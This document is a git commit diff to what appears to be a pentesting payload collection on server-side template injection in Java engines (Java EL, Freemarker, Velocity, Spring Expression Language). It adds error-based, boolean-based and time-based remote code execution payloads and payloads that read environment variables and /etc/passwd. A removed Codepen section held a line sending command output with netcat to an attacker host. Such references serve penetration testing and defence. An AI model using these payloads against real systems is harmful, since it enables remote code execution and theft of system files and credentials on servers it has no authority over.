SSI:

- Added SSTImap to the tools, as it now supports SSI detection and exploitation SSTI: - Added description for known detection and exploitation techniques - Added payloads for universal detection - Added universal payloads for different languages - Added Error-Based and Boolean-Based payloads - Moved SpEL payloads using `T()` to the correct category - Moved Pug payloads to the correct language and updated info to reflect the actual name
2026-02-04 19:11:51 -08:00 · 2026-01-03 05:20:04 +03:00
parent bd72827e58
commit 7fb2ff75d7
12 changed files with 405 additions and 97 deletions
--- a/Injection/Java.md
+++ b/Injection/Java.md
@@ -5,16 +5,14 @@
 ## Summary

 - [Templating Libraries](#templating-libraries)
- [Java](#java)
-    - [Java - Basic Injection](#java---basic-injection)
-    - [Java - Retrieve Environment Variables](#java---retrieve-environment-variables)
-    - [Java - Retrieve /etc/passwd](#java---retrieve-etcpasswd)
+- [Java EL](#java-el)
+    - [Java EL - Basic Injection](#java-el---basic-injection)
+    - [Java EL - Code Execution](#java-el---code-execution)
 - [Freemarker](#freemarker)
    - [Freemarker - Basic Injection](#freemarker---basic-injection)
    - [Freemarker - Read File](#freemarker---read-file)
    - [Freemarker - Code Execution](#freemarker---code-execution)
    - [Freemarker - Sandbox Bypass](#freemarker---sandbox-bypass)
- [Codepen](#codepen)
 - [Jinjava](#jinjava)
    - [Jinjava - Basic Injection](#jinjava---basic-injection)
    - [Jinjava - Command Execution](#jinjava---command-execution)
@@ -30,6 +28,8 @@
    - [Groovy - Sandbox Bypass](#groovy---sandbox-bypass)
 - [Spring Expression Language](#spring-expression-language)
    - [SpEL - Basic Injection](#spel---basic-injection)
+    - [SpEL - Retrieve Environment Variables](#spel---retrieve-environment-variables)
+    - [SpEL - Retrieve /etc/passwd](#spel---retrieve-etcpasswd)
    - [SpEL - DNS Exfiltration](#spel---dns-exfiltration)
    - [SpEL - Session Attributes](#spel---session-attributes)
    - [SpEL - Command Execution](#spel---command-execution)
@@ -37,20 +37,22 @@

 ## Templating Libraries

-| Template Name | Payload Format |
-| ------------ | --------- |
-| Codepen    | `#{}`     |
-| Freemarker | `${3*3}`, `#{3*3}`, `[=3*3]` |
-| Groovy     | `${9*9}`  |
-| Jinjava    | `{{ }}`   |
-| Pebble     | `{{ }}`   |
-| Spring     | `*{7*7}`  |
-| Thymeleaf  | `[[ ]]`   |
-| Velocity   | `#set($X="") $X`             |
+| Template Name | Payload Format         |
+|---------------|------------------------|
+| Codepen       | `#{ }`                 |
+| Freemarker    | `${ }`, `#{ }`, `[= ]` |
+| Groovy        | `${ }`                 |
+| Jinjava       | `{{ }}`                |
+| Pebble        | `{{ }}`                |
+| Spring        | `*{ }`                 |
+| Thymeleaf     | `[[ ]]`                |
+| Velocity      | `#set($X="") $X`       |

-## Java
+## Java EL

-### Java - Basic Injection
+### Java EL - Basic Injection
+
+> Java has multiple Expression Languages using similar syntax.

 > Multiple variable expressions can be used, if `${...}` doesn't work try `#{...}`, `*{...}`, `@{...}` or `~{...}`.

@@ -62,18 +64,14 @@ ${class.getResource("").getPath()}
 ${class.getResource("../../../../../index.htm").getContent()}
 ```

-### Java - Retrieve Environment Variables
+### Java EL - Code Execution

 ```java
-${T(java.lang.System).getenv()}
-```
+${''.getClass().forName('java.lang.String').getConstructor(''.getClass().forName('[B')).newInstance(''.getClass().forName('java.lang.Runtime').getRuntime().exec('id').inputStream.readAllBytes())} // Rendered RCE
+${''.getClass().forName('java.lang.Integer').valueOf('x'+''.getClass().forName('java.lang.String').getConstructor(''.getClass().forName('[B')).newInstance(''.getClass().forName('java.lang.Runtime').getRuntime().exec('id').inputStream.readAllBytes()))} // Error-Based RCE
+${1/((''.getClass().forName('java.lang.Runtime').getRuntime().exec('id').waitFor()==0)?1:0)+''} // Boolean-Based RCE
+${(''.getClass().forName('java.lang.Runtime').getRuntime().exec('id').waitFor().equals(0)?(''.getClass().forName('java.lang.Thread')).sleep(5000):0).toString()} // Time-Based RCE

-### Java - Retrieve /etc/passwd
-
-```java
-${T(java.lang.Runtime).getRuntime().exec('cat /etc/passwd')}
-
-${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
 ```

 ---
@@ -108,6 +106,10 @@ Convert the returned bytes to ASCII
 ${"freemarker.template.utility.Execute"?new()("id")}
 #{"freemarker.template.utility.Execute"?new()("id")}
 [="freemarker.template.utility.Execute"?new()("id")]
+
+${("xx"+("freemarker.template.utility.Execute"?new()("id")))?new()} // Error-Based RCE
+${1/((freemarker.template.utility.Execute"?new()(" … && echo UniqueString")?chop_linebreak?ends_with("UniqueString"))?string('1','0')?eval)} // Boolean-Based RCE
+${"freemarker.template.utility.Execute"?new()("id && sleep 5")} // Time-Based RCE
 ```

 ### Freemarker - Sandbox Bypass
@@ -124,24 +126,6 @@ ${dwf.newInstance(ec,null)("id")}

 ---

-## Codepen
-
-[Official website](https://codepen.io/)
->
-
-```python
- var x = root.process
- x = x.mainModule.require
- x = x('child_process')
-= x.exec('id | nc attacker.net 80')
-```
-
-```javascript
-#{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout}
-```
-
---
-
 ## Jinjava

 [Official website](https://github.com/HubSpot/jinjava)
@@ -259,6 +243,41 @@ A more flexible and stealthy payload that supports base64-encoded commands, allo
 #end
 ```

+Error-Based RCE payload:
+
+```java
+#set($s="")
+#set($sc=$s.getClass().getConstructor($s.getClass().forName("[B"), $s.getClass()))
+#set($p=$s.getClass().forName("java.lang.Runtime").getRuntime().exec("id")
+#set($n=$p.waitFor())
+#set($b="Y:/A:/"+$sc.newInstance($p.inputStream.readAllBytes(), "UTF-8"))
+#include($b)
+```
+
+Boolean-Based RCE payload:
+
+```java
+#set($s="")
+#set($p=$s.getClass().forName("java.lang.Runtime").getRuntime().exec("id"))
+#set($n=$p.waitFor())
+#set($r=$p.exitValue())
+#if($r != 0)
+#include("Y:/A:/xxx")
+#end
+```
+
+Time-Based RCE payload:
+
+```java
+#set($s="")
+#set($p=$s.getClass().forName("java.lang.Runtime").getRuntime().exec("id"))
+#set($n=$p.waitFor())
+#set($r=$p.exitValue())
+#if($r != 0)
+#set($t=$s.getClass().forName("java.lang.Thread").sleep(5000))
+#end
+```
+
 ---

 ## Groovy
@@ -310,6 +329,8 @@ ${ new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(val

 ## Spring Expression Language

+> Java EL payloads also work for SpEL
+
 [Official website](https://docs.spring.io/spring-framework/docs/3.0.x/reference/expressions.html)

 > The Spring Expression Language (SpEL for short) is a powerful expression language that supports querying and manipulating an object graph at runtime. The language syntax is similar to Unified EL but offers additional features, most notably method invocation and basic string templating functionality.
@@ -321,6 +342,20 @@ ${7*7}
 ${'patt'.toString().replace('a', 'x')}
 ```

+### SpEL - Retrieve Environment Variables
+
+```java
+${T(java.lang.System).getenv()}
+```
+
+### SpEL - Retrieve /etc/passwd
+
+```java
+${T(java.lang.Runtime).getRuntime().exec('cat /etc/passwd')}
+
+${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
+```
+
 ### SpEL - DNS Exfiltration

 DNS lookup
@@ -390,3 +425,4 @@ ${pageContext.request.getSession().setAttribute("admin",true)}
 - [Leveraging the Spring Expression Language (SpEL) injection vulnerability (a.k.a The Magic SpEL) to get RCE - Xenofon Vassilakopoulos - November 18, 2021](https://xen0vas.github.io/Leveraging-the-SpEL-Injection-Vulnerability-to-get-RCE/)
 - [RCE in Hubspot with EL injection in HubL - @fyoorer - December 7, 2018](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html)
 - [Remote Code Execution with EL Injection Vulnerabilities - Asif Durani - January 29, 2019](https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf)
+- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)